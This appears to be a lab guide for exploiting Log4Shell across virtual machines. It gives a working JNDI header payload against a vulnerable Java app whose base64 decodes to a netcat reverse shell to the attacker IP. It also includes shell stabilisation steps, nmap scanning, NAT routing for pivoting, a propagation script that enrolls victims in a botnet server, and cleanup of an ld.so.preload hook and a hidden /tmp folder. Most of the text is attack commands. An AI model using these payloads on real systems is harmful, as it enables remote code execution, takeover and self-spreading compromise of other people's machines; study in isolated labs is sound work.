- Install Java JDK 1.8.0_20. Download from: https://www.oracle.com/es/java/technologies/javase/javase8-archive-downloads.html
- For linux 64 bits download: "jdk-8u20-linux-x64.tar.gz"
- Extract the content to the Desktop
- Add Java JDK to the PATH: export PATH=/home/kali/Desktop/jdk1.8.0_20/bin:$PATH
- Check java version: "1.8.0_20" with following command: java -version
- Open app folder.
- Execute following command:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar
If you want to customize and build the server, you could follow next steps:
-
Install gradle 7.3.1.
-
Create a dir in "/home/gradle/src".
-
Put all the files from the repo: https://github.com/christophetd/log4shell-vulnerable-app
-
Install Java JDK 1.8.0_20. Download from: https://www.oracle.com/es/java/technologies/javase/javase8-archive-downloads.html
- For linux 64 bits download: "jdk-8u20-linux-x64.tar.gz"
- Extract the content to the Desktop
- Add Java JDK to the PATH: export PATH=/home/kali/Desktop/jdk1.8.0_20/bin:$PATH
- Check java version: "1.8.0_20" with following command:
java -version
-
Go to "/home/gradle/src"
-
Execute gradle bootJar --no-daemon
-
Execute the vulnerable webserver: java -jar .jar
- Attacker: 10.0.2.9
- Victim: 10.0.2.10
- Run the vulnerable webserver in the victim machine: follow the steps of above "Simulate the vulnerable server" section.
- Listen with nc in the attacker machine: nc -lvp 4444 -n
- In the attacket machine execute the exploit that will initiate the LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.2.9 -p 8888 - Send the following payload from attacker machine to the vulnerable machine:
curl 10.0.2.10:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.2.9:1389/Basic/Command/Base64/bmMgMTAuMC4yLjkgNDQ0NCAtZSAvYmluL2Jhc2g=}' - Previous payload executes the following command in the victim: "nc 10.0.2.9 4444 -e /bin/bash". If you want to change the command, encode it in base64 and send the following payload:
curl 10.0.2.10:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.2.9:1389/Basic/Command/Base64/<base64-encoded-command>}'
Exploit source: https://github.com/welk1n/JNDI-Injection-Exploit
python3 -c "import pty; pty.spawn('/bin/bash')"
CTRL+Z
stty raw -echo;fg
id
Source: https://ice-wzl.medium.com/netcat-shell-stabilization-248b83bcc06c
- Get network interfaces: ifconfig.
- Scan all the subnets: nmap -sn 192.168.1.0/24
- Port scan to detect if it can be a vulnerable app: "nmap -v 192.168.1.10" or "nmap -v -p- 192.168.1.10" (all ports)
https://github.com/giterlizzi/nmap-log4shell
https://github.com/adilsoybali/Log4j-RCE-Scanner
IP: 10.0.2.9
- Malicious LDAP and HTTP server listening at port 8888.
- Botnet server listening at port 9090.
IP: 10.0.2.10
IP: 10.0.3.4
- Vulnerable webserver listening in port 8080.
IP: 10.0.3.5
- Vulnerable webserver listening in port 8080.
Default gateway via router:
sudo ip route add default via 10.0.2.10
Enable IPv4 forwarding: /etc/sysctl.conf and uncomment the line: net.ipv4.ip_forward=1
Enable NAT.
sudo iptables -t nat -L -n -v --line-numbers
sudo iptables -t nat -F
sudo ip route add default via 10.0.3.1
sudo iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
Default gateway via router:
sudo ip route add default via 10.0.3.4
- Start LDAP and HTTP server in VM1:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.2.9 -p 8888 - Start vulnerable server in VM2:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar - Start vulnerable server in VM3:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar - Execute
propagation.pyin VM1:python propagation.py - Check that you have two connections on VM1 botnet server.
echo "" | sudo tee /etc/ld.so.preload
sudo rm -r /tmp/.bflix